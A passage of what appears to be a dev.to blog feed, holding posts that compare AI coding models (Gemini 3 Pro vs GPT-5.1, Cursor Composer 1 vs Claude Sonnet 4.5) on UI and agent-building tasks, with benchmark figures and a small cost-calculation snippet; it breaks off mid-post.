&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmdbo0rn1n2pcuvbtd13m.gif" alt="Bye Bye Ryan Gosling GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>opensource</category>
      <category>rag</category>
      <category>productivity</category>
    </item>
    <item>
      <title>✨Gemini 3 Pro vs GPT 5.1: Which One Codes Better? 🚀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 25 Nov 2025 14:02:17 +0000</pubDate>
      <link>https://dev.to/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</link>
      <guid>https://dev.to/composiodev/gemini-3-pro-vs-gpt-51-which-one-codes-better-1nld</guid>
      <description>&lt;p&gt;Gemini 3 Pro just dropped, and it is already getting a lot of attention for its reasoning and long context abilities.&lt;/p&gt;

&lt;p&gt;But now, the natural question is, "How well does it code?"&lt;/p&gt;

&lt;p&gt;And does it actually outperform GPT 5.1 Codex, which, in my tests, has been the best so far (better than Claude 4.5 Sonnet) on real tasks?&lt;/p&gt;

&lt;p&gt;To find out, I put it side by side with GPT 5.1 and tested both models on two fundamental tasks: a UI build and a complete agent workflow.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbqhs1vxfwei2fuz6ho4r.gif" alt="Let's Go GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will go through the results in a moment, but first, let's have a quick TL;DR and a refresher on Gemini 3.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here is how both models performed in the test:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Gemini 3 Pro handled both the UI task and the agent build more cleanly, requiring very few follow-ups.&lt;/li&gt;
&lt;li&gt;The most significant difference showed up in the agent test, where Gemini 3 Pro actually followed the documentation and built the agent well, while GPT-5.1 ran into a few issues with the implementation.&lt;/li&gt;
&lt;li&gt;Even though the gap isn't dramatic in our tests, Gemini 3 Pro feels like the safer bet for everyday coding.&lt;/li&gt;
&lt;li&gt;Latency is higher than GPT-5.1 Codex and can be frustrating for minor fixes.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you are doing real coding or building agents, Gemini 3 Pro is the better choice right now.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; The goal of this test is to show how much of a jump Gemini 3 Pro is compared to the best models we had before its release.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Brief on Gemini 3 Pro
&lt;/h2&gt;

&lt;p&gt;Gemini 3 was released on November 18th with state-of-the-art reasoning and, unlike most Google models, was pushed directly to Search with no waiting period or beta testing.&lt;/p&gt;

&lt;p&gt;Gemini 3 is Google's most intelligent model family to date, and it is state-of-the-art (SOTA) across a variety of benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvog83hggtz5on1xk0weu.png" alt="Gemini 3 Pro model stats"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, this model makes almost every model we had until now, including GPT-5.1 and Claude 4.5 Sonnet, look outdated. The difference in the numbers is just insane.&lt;/p&gt;

&lt;p&gt;Here are the results I find the most incredible:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;LMArena Elo: 1501 (crossing GPT-5.1 and Claude Sonnet 4.5)&lt;/li&gt;
&lt;li&gt;Humanity's Last Exam: 37.5% without tools (&lt;strong&gt;hardest&lt;/strong&gt; AGI benchmark available)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 91.9% (PhD-level science reasoning)&lt;/li&gt;
&lt;li&gt;AIME 2025: 95% (high school mathematics)&lt;/li&gt;
&lt;li&gt;MathArena Apex: 23.4% (new state-of-the-art)&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;"Gemini 1 introduced native multimodality and long context to help AI understand the world. Gemini 2 added thinking, reasoning and tool use to create a foundation for agents.&lt;/p&gt;

&lt;p&gt;Now, Gemini 3 brings these capabilities together – so you can bring any idea to life."&lt;/p&gt;

&lt;p&gt;~ Google DeepMind&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fext9see4c8iy5ijiotgj.png" alt="Google Deepmind claim on Gemini 3"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, it's built by putting together the good sides of the earlier Gemini models.&lt;/p&gt;

&lt;p&gt;Talking about its specs, it comes with a huge 1M input token context window and an output token limit of 64K.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🤔 &lt;strong&gt;What's the difference from Gemini 2.5 Pro?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Specs are almost the same. Both 2.5 Pro and 3 Pro give you about a 1M input window, 64K output and full multimodal support. But Gemini 3 Pro is a clear upgrade in &lt;strong&gt;how it thinks&lt;/strong&gt; with that context. It scores roughly 10 to 20 per cent higher on many reasoning benchmarks, takes a massive jump on complex tests like ARC-AGI-2 and SimpleQA, and performs better at long-context retrieval at the 1M scale.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9zge5q1715wnz0hmynfm.png" alt="Gemini 3 hallucination"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hallucination rate improves only marginally over Gemini 2.5 Pro, and Claude still leads by a significant margin on this metric, an area where Gemini 3 should have done better. We will test it shortly.&lt;/p&gt;

&lt;p&gt;Google is also clearly tuning this model for real agent-style workflows, not just chat. In practice, that means Gemini 3 Pro is built to run tools, browse, execute code, and plug into your agentic workflows.&lt;/p&gt;

&lt;p&gt;Google has launched it everywhere, so you can already get the idea of how confident they are in this model.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1mb3qk7tzvr4y7xb37ur.png" alt="Gemini 3 availability"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Google has also launched &lt;strong&gt;Deep Think Mode&lt;/strong&gt; alongside Gemini 3 Pro. It isn't public yet, but it uses extended reasoning chains to work through complex problems, like taking a moment to think before answering. It improves on the raw Gemini 3 Pro across benchmarks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Humanity's Last Exam: 41.0% (vs. 37.5% with standard Gemini 3 Pro)&lt;/li&gt;
&lt;li&gt;GPQA Diamond: 93.8% (vs. 91.9% with Gemini 3 Pro)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2tezrky7jb0if43z5t6z.png" alt="Gemini 3 Deep Think"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;They are running safety checks before the public release to ensure it isn't misused.&lt;/p&gt;

&lt;p&gt;To learn more about the model, see its model card here: &lt;a href="https://storage.googleapis.com/deepmind-media/Model-Cards/Gemini-3-Pro-Model-Card.pdf" rel="noopener noreferrer"&gt;Gemini 3 Pro Model Card&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Now, let's start with the coding test. We will be comparing Gemini 3 Pro with GPT-5.1 on two tasks.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;UI Test:&lt;/strong&gt; I've already seen dozens of videos and demos praising Gemini 3 for its frontend coding, so we will run one to see how well it handles a basic task.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Building an Agent:&lt;/strong&gt; We will make an agent from scratch, as it's also a model known to be great at agentic workflows.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  1. UI Test - Clone Windows 11
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/b394169b45a1f8da947da6dcec18dc70" rel="noopener noreferrer"&gt;Prompt - UI Test&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/3f82d6037608b5212df462ea993ba231" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Y8hQdr54AZ0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is by far the best response I've gotten from any AI model to this prompt to date. This is just too good. The overall feel does resemble Windows 11. The choice of icons could have been better, but the overall look and feel are really, really close.&lt;/p&gt;

&lt;p&gt;On this question, I'm not looking at how the model implements logic, but rather its pure frontend skills, and this one has done it well. Also, the wallpaper-changing feature is cool and works.&lt;/p&gt;

&lt;p&gt;It took about 10 minutes to implement it all. The total output token usage was around 30K, including the README, LICENSE, and a few other document files it generated on its own. So, be careful when using YOLO mode in Gemini CLI. 😑&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F42sdr8azbqpzanocdpbi.png" alt="Gemini 3 token usage coding UI problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1 codex:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/e8ec4a2072f15aa14fef9cfde65ec439" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/09WhZpqVl-U"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This is super close to Gemini's implementation, but there's a lot of stuff that feels missing and could be improved.&lt;/p&gt;

&lt;p&gt;Even though Gemini 3 Pro's output looks and feels much better, GPT-5.1's code for this task is the stronger of the two. If you look at how it's structured and how types are declared, GPT-5.1's codebase is clearly cleaner.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Building a Calendar Agent
&lt;/h3&gt;

&lt;p&gt;To build the agent, let's use something different. This time, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/7b44bd642c470d4a0e76343721a6e05b" rel="noopener noreferrer"&gt;Prompt - Agent Coding&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Response from Gemini 3 Pro:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/595a4570477bee4c99c4872f0801037d" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/N6-iAr6Zu5I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;This works. It's not the best implementation with the best-written code style, but it simply works. Minimal yet functional. It's fascinating how well this model understands the context from the provided link and finds all the pieces it needs to put together.&lt;/p&gt;

&lt;p&gt;There are still many type issues and a few implementation issues; all in all, it's hanging by a thread, yet surprisingly, it just works.&lt;/p&gt;

&lt;p&gt;In terms of time, it took about &lt;strong&gt;5 minutes&lt;/strong&gt; to build this entire agent. And, just to be clear, it's not a one-shot; I had to help it with a little bit of setup.&lt;/p&gt;

&lt;p&gt;The entire test took around 14K output tokens, and since the prompt I gave is very verbose, the input token count is significantly higher.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhkofqu50wxiw5mtc3h33.png" alt="Gemini 3 token usage coding agent problem"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response from GPT-5.1:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the first version it gave me:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/O4lknG9RzbM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;For real, it just mocked the entire agent route. The Composio Tool Router isn't used at all. This is so depressing. All it did was create the UI and stub out the whole agent implementation.&lt;/p&gt;

&lt;p&gt;You can find the agent route code that it generated here: &lt;a href="https://gist.github.com/shricodev/0733c30fb7f90a5cf15ebb3227ddeecf" rel="noopener noreferrer"&gt;Link&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, I had to copy and paste some parts of the tool router documentation manually, and with a lot of hand-holding this time and showing the Gemini 3 code as a reference, I got it somewhat working. But still, the UI is messed up, and the cards don't show.&lt;/p&gt;

&lt;p&gt;Here's the final output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Rz7tr5rQS2w"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/c2918c741dce9dbd2288b7c39b45cfa5" rel="noopener noreferrer"&gt;Source Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27iz2yk4ccdgnnj8pu36.png" alt="OpenAI GPT-5.1 usage coding the agent"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Gemini 3 Pro kind of lived up to the hype in these tests. As for the code quality, both completed the test in one go for the most part, and the code is modular and follows best practices. However, sometimes GPT-5.1 provided much better code than Gemini 3 Pro. 🤷‍♂️&lt;/p&gt;

&lt;p&gt;Gemini 3 is noticeably better at agent-style workflows, and even at UI work, and it shows. I'm really looking forward to seeing how Deep Think mode improves things once it rolls out.&lt;/p&gt;

&lt;p&gt;If you're still curious to learn more, there's one blog that I recommend that you go through, "&lt;a href="https://www.oneusefulthing.org/p/three-years-from-gpt-3-to-gemini" rel="noopener noreferrer"&gt;Three Years from GPT-3 to Gemini 3&lt;/a&gt;" by Ethan Mollick, that walks you through the whole AI arc in these years and gives you some intuition on what's changed, beyond just the benchmark numbers.&lt;/p&gt;

&lt;p&gt;It's still early, and results may vary with different prompts, but for practical coding tasks, Gemini 3 Pro is a top model.&lt;/p&gt;

&lt;p&gt;Try it with your own projects and you will see what I mean. Share your results if you test it on something real. ✌️&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuvmt7tsf2i60yuvw58wg.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>🧠 Cursor Composer 1 vs Claude 4.5 Agent Build Comparison ⚡</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 12 Nov 2025 13:45:23 +0000</pubDate>
      <link>https://dev.to/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</link>
      <guid>https://dev.to/composiodev/cursor-composer-1-vs-claude-45-agent-build-comparison-2big</guid>
      <description>&lt;p&gt;The AI coding race is heating up again. After OpenAI, Anthropic, and Google, Cursor has stepped into the game with its new model, Composer 1, a coding-focused agent model that’s said to be 4x faster than other models with similar intelligence. 🤨&lt;/p&gt;

&lt;p&gt;It’s said to output code at lightning speed, reason through large contexts, and even outperform models like GPT-5 and Claude Sonnet in engineering workflows.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fom4sytnsmuql4t1cf0n1.gif" alt="Sus GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s a bold claim, so I decided to test it myself. In this post, we’ll see how Composer 1 performs when building an actual agent and to make things fair, I’ll put it head-to-head with Claude Sonnet 4.5, one of the most consistent coding models out there.&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the results, here’s a quick rundown of how both models performed in building a simple agent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Composer 1&lt;/strong&gt; produced the more complete implementation and the faster output. It coded the entire agent in under 3 minutes, though it needed two small follow-ups.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.5&lt;/strong&gt; also got the job done, but sometimes used outdated API methods, even though I clearly provided the latest documentation for a Python package. It tends to rely more on its training data than the instructions you give it.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In terms of code quality and implementation, there’s not much difference. That said, Sonnet 4.5 burned almost twice the tokens, while Composer 1 delivered similar results in half the time (not 4x) with far fewer tokens. It’s efficient, fast, and feels like a strong pick for everyday coding.&lt;/p&gt;




&lt;h2&gt;
  
  
  Brief on Cursor Composer
&lt;/h2&gt;

&lt;p&gt;Since this model dropped only a few weeks ago, here’s a short refresher.&lt;/p&gt;

&lt;p&gt;Composer 1 is the first agent-focused coding model from Cursor. They claim it’s about &lt;strong&gt;4x faster&lt;/strong&gt; than similarly intelligent models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" alt="Cursor Composer 1 Bench Score"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(By the way, what even is the &lt;strong&gt;Cursor Bench Score&lt;/strong&gt;? Can't really trust all the metrics blindly. 🤷‍♂️)&lt;/p&gt;

&lt;p&gt;It is said to be a mixture-of-experts (MoE) language model supporting long-context generation and understanding. As mentioned earlier, it was trained with Reinforcement Learning (RL) specifically for agent building and general software engineering workflows.&lt;/p&gt;

&lt;p&gt;They've positioned it as a frontier coding model: top-tier intelligence at a speed that surpasses peer models of similar capability. It outputs &lt;strong&gt;250 tokens per second&lt;/strong&gt;, roughly twice as fast as most coding models and about 4–5 times faster than some reasoning models.&lt;/p&gt;

&lt;p&gt;As for pricing, it matches GPT-5: &lt;strong&gt;$1.25&lt;/strong&gt; per million input tokens and &lt;strong&gt;$10&lt;/strong&gt; per million output tokens, which is pretty affordable for what it promises.&lt;/p&gt;
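&lt;p&gt;At those rates, a run's cost is easy to estimate. Here's a minimal sketch; the helper name and example token counts are mine, while the prices are the listed ones:&lt;/p&gt;

```python
# Cost sketch at Composer 1's listed rates (same as GPT-5):
# $1.25 per million input tokens, $10 per million output tokens.

INPUT_USD_PER_M = 1.25
OUTPUT_USD_PER_M = 10.0

def request_cost_usd(input_tokens: int, output_tokens: int) -> float:
    """USD cost of one request at the listed per-million-token rates."""
    return (input_tokens / 1_000_000) * INPUT_USD_PER_M + (
        output_tokens / 1_000_000
    ) * OUTPUT_USD_PER_M

# e.g. a run that burns 500K input and 200K output tokens:
print(round(request_cost_usd(500_000, 200_000), 3))  # 2.625
```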

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" alt="Cursor Composer 1 pricing with other models table"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is clearly aimed at replacing models like GPT-5 and Claude Sonnet 4.5 for software development. Although it is said that these models beat Composer 1 in pure coding intelligence, they run much slower.&lt;/p&gt;

&lt;p&gt;So, we can say that Composer comes with a bit of an accuracy trade-off for a &lt;strong&gt;lot&lt;/strong&gt; of speed gain, which could be a great option for some but not for everyone.&lt;/p&gt;

&lt;p&gt;But all of these claims come from Cursor's own benchmark. It's up to you whether you decide to trust it or not. 🤷‍♂️&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Alright, enough talk. Let’s see how Composer 1 stacks up against Sonnet 4.5 in actual coding.&lt;/p&gt;

&lt;p&gt;Since Composer is pitched as an “agentic” model, I wanted to see how well it could handle building an AI agent from scratch.&lt;/p&gt;

&lt;p&gt;To build the agent, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡&lt;strong&gt;Fun Fact:&lt;/strong&gt; Tool Router is what powers complex agentic products like &lt;a href="https://rube.app" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;h3&gt;
  
  
  What's the plan?
&lt;/h3&gt;

&lt;p&gt;I asked both models to build a small Python agent that takes a YouTube URL, finds the interesting parts of the video, and posts a Twitter thread on behalf of the user.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; "Create an AI Agent in Python when given a YouTube URL, The agent will find the interesting part of the video and post a tweeter thread on behalf of the user. For this, use the Composio's Tool Router: &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;https://docs.composio.dev/docs/tool-router/quick-start&lt;/a&gt;. Note: Don’t use Composio’s YouTube Integration, build a custom tool on your own using the YouTube Transcript API (to make things a little harder)."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Composer 1
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/aada89ce44f833a62fd41368d770b4c7" rel="noopener noreferrer"&gt;Composer 1 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/zoJu535wWBY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Composer was really fast. It took a little over 3 minutes to produce the first response, though it ran into a small issue implementing the YouTube transcript function and registering it as a custom tool for the agent.&lt;/p&gt;

&lt;p&gt;It also misused a few types and functions from the modules, but nothing too severe.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" alt="Cursor Composer 1 agent with code errors"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But after some back and forth over two more prompts, with a little help from my side, it got everything working.&lt;/p&gt;

&lt;p&gt;As for the Composio side of things, working with the Tool Router, it didn't really run into any problems.&lt;/p&gt;

